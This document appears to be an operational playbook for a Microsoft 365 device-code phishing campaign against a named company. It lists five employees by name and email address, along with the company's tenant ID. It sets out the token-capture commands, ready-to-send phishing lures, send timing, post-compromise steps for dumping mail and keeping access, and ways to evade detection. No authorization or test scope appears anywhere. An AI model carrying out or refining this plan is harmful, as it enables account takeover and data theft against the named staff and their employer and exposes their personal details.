# M365 Device Code Phishing Setup
# Target: wearesocial.com IT Personnel
# Date: 2026-01-23

## OVERVIEW
Device code phishing exploits Microsoft's OAuth 2.0 device authorization grant flow.
It bypasses MFA by tricking users into authenticating on a legitimate Microsoft page.
Once authenticated, attacker receives access_token and refresh_token.

## TARGET INFO (from Week 1-3 Recon)
M365 Tenant: c444fffe-2181-46e8-ad79-6da1c731c973
Email: Google Workspace (NOT M365)
M365 Used For: SharePoint, Teams, OneDrive (NOT email)
Okta: pssoEnabled: false (vulnerable to device code)

## PRIORITY TARGETS
1. david.whybrow@wearesocial.com (IT Director) - HIGH VALUE
2. simone.scremin@wearesocial.com (Technology Director) - HIGH VALUE
3. tobias.hall@wearesocial.com (Global Systems Manager)
4. neil.lee@wearesocial.com (Senior Systems Manager)
5. jimmy.reilly@wearesocial.com (Senior IT Support)

## REQUIRED TOOLS

### 1. TokenTactics (PowerShell)
git clone https://github.com/rvrsh3ll/TokenTactics.git
Import-Module ./TokenTactics/TokenTactics.psd1

### 2. AADInternals (PowerShell)
Install-Module AADInternals -Force
Import-Module AADInternals

### 3. catFish0365 (Python - automated)
git clone https://github.com/froyo75/catFish0365.git

## ATTACK FLOW

### Step 1: Generate Device Code
# Using TokenTactics:
Get-AzureToken -Client MSGraph

# Returns:
# user_code: XXXXXXXX
# device_code: <long_string>
# verification_uri: https://microsoft.com/devicelogin

### Step 2: Send Phishing Email
# Replace {{DEVICE_CODE}} in template with user_code
# Email must be sent within 15 minutes (code expiry)

### Step 3: Token Polling
# TokenTactics automatically polls /token endpoint
# Once user authenticates, tokens are captured in $response

### Step 4: Post-Exploitation
$response.access_token  # Access SharePoint, Teams, OneDrive
$response.refresh_token # Valid for 1 year - persistence

## PHISHING PRETEXTS (for wearesocial.com)

### Pretext 1: IT Security Verification
Subject: Action Required: Verify Your Microsoft 365 Account
Body: IT Security requires all staff to verify their M365 account
      due to recent security updates. Please complete verification.

### Pretext 2: SharePoint Access Issue
Subject: SharePoint Access - Action Required
Body: We've detected an issue with your SharePoint permissions.
      Please verify your account to restore access.

### Pretext 3: Teams MFA Enrollment
Subject: Microsoft Teams - Complete MFA Setup
Body: As part of our security upgrade, please complete the
      MFA enrollment for Microsoft Teams.

### Pretext 4: Salary/HR Document
Subject: Q1 2026 Salary Review - Confidential
Body: Please verify your identity to access the salary
      adjustment report for Q1 2026.

## TIMING CONSIDERATIONS
- Send during business hours (9AM-12PM GMT recommended)
- Tuesday-Thursday have highest engagement
- Device codes expire in 15 minutes - synchronize email send
- Hybrid work policy: 3 days/week office (Mon/Tue/Wed likely)

## POST-COMPROMISE ACTIONS
1. Access SharePoint: Invoke-RefreshToMSGraphToken
2. Access Teams: Invoke-RefreshToMSTeamsToken
3. Dump emails: Invoke-DumpOWAMailboxViaMSGraphApi
4. Enumerate Azure: Use AzureHound with obtained tokens
5. Persistence: Store refresh_token (valid 1 year)

## DETECTION EVASION
- Login appears from attacker location, not victim
- Access tokens from refresh don't appear in sign-in logs
- Use residential proxy for initial device code request
- Rotate tokens regularly to avoid detection

## MITRE ATT&CK
T1566.002 (Phishing: Spearphishing Link)
T1078.004 (Cloud Accounts)
T1528 (Steal Application Access Token)
T1556.006 (Multi-Factor Authentication)

## SUCCESS METRICS
- Estimated click rate: 5-15%
- Estimated success rate: 70% (of those who click)
- Target: 1-3 compromised accounts from 5 targets
